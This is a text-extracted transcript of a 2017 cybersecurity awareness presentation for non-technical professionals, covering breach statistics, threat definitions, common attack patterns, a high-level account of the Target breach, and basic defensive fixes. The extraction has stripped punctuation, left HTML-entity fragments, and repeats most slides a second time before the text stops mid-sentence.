what non-technical professionals need to know to navigate ... · • cyberinsurance market will...
TRANSCRIPT
October 27 2017
copyStinnett amp Associates LLC
David Losacco CPA CISA | Principal
What non-technical professionals need to know to navigate the cybersecurity landscape
October 27 2017
TECHNOLOGY amp CYBERSECURITY
David Losacco
copyStinnett amp Associates LLC3
Personal Introduction
Graduated from TU with a Bachelorrsquos Degree in Accounting and MIS
Dad of Four Sophie (17) Zoe (15) Sadie (12) Rocco (8)
Started Career as an ERP Systems Implementation Consultant then spent 10 years with PricewaterhouseCoopers (PwC)
Joined Stinnett amp Associates as a Principal in 2006
Has his CPA CIA and CISA certifications
Significant experience in Business Process and IT Consulting IT and Application Controls and Risk Management
Industries include energy with heavy upstream focus manufacturing and telecommunications
Background
Interests
Golf four kids limit my opportunities
Did I mention the four kids Interests are limited
The Great Circus that is our Political System
Vegas during March Madness
copyStinnett amp Associates LLC
DISCLAIMER
bull The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
4
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
October 27 2017
TECHNOLOGY amp CYBERSECURITY
David Losacco
copyStinnett amp Associates LLC3
Personal Introduction
Graduated from TU with a Bachelorrsquos Degree in Accounting and MIS
Dad of Four Sophie (17) Zoe (15) Sadie (12) Rocco (8)
Started Career as an ERP Systems Implementation Consultant then spent 10 years with PricewaterhouseCoopers (PwC)
Joined Stinnett amp Associates as a Principal in 2006
Has his CPA CIA and CISA certifications
Significant experience in Business Process and IT Consulting IT and Application Controls and Risk Management
Industries include energy with heavy upstream focus manufacturing and telecommunications
Background
Interests
Golf four kids limit my opportunities
Did I mention the four kids Interests are limited
The Great Circus that is our Political System
Vegas during March Madness
copyStinnett amp Associates LLC
DISCLAIMER
bull The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
4
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
